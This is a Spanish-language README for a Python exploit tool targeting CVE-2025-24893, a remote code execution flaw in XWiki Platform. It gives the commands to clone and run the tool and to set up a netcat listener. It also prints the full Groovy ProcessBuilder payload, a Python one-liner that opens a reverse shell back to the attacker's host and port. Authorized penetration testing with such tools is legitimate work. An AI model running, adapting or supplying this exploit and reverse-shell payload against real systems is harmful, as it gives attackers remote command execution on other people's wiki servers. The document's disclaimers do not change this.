
Exploit modificado para CVE-2025-24893
Un script sencillo en Python3 para explotar CVE-2025-24893, una vulnerabilidad de ejecución remota de código en XWiki Platform, usando una macro asíncrona basada en Groovy y un payload de reverse shell configurable.
⚠️ ADVERTENCIA: Esta herramienta se proporciona únicamente con fines educativos y de pruebas autorizadas. El uso no autorizado contra sistemas que no posees o para los que no tienes permiso explícito para probar es ilegal y poco ético.
ProcessBuilder para evitar las peculiaridades de Runtime.execrequestspip install requests
Clona este repositorio:
git clone https://github.com/hackersonsteroids/cve-2025-24893.git
cd cve-2025-24893
./exploit.py <TARGET_DOMAIN> <LHOST> <LPORT>
<TARGET_DOMAIN>
El host de XWiki (por ejemplo, wiki.example.local).
<LHOST>
La IP de tu máquina atacante (donde se está ejecutando tu listener).
<LPORT>
El puerto de tu listener (entero).
nc -lvnp 4444
./exploit.py wiki.vulnerable.local 10.0.0.5 4444
netcat para ver una shell.Antes de enviar el payload, el script:
https://<TARGET_DOMAIN>http://<TARGET_DOMAIN> si HTTPS fallaEsto ayuda a garantizar la compatibilidad con implementaciones de protocolo mixto.
Por defecto, el script utiliza un one-liner de Python3:
new ProcessBuilder(
['/bin/bash','-c',
'python3 -c \'import socket,subprocess,os;'
's=socket.socket();s.connect(("LHOST",LPORT));'
'os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);'
'os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])\'']
).redirectErrorStream(true).start()
build_payload() si necesitas una shell diferente (por ejemplo, Bash, Perl, PHP, etc.).Este proyecto está licenciado bajo la Licencia MIT. Consulta el archivo LICENSE para más detalles.
Esta herramienta está diseñada únicamente para evaluación de seguridad autorizada y fines educativos. Los autores no se hacen responsables del mal uso. Obtén siempre permiso explícito antes de probar cualquier sistema objetivo.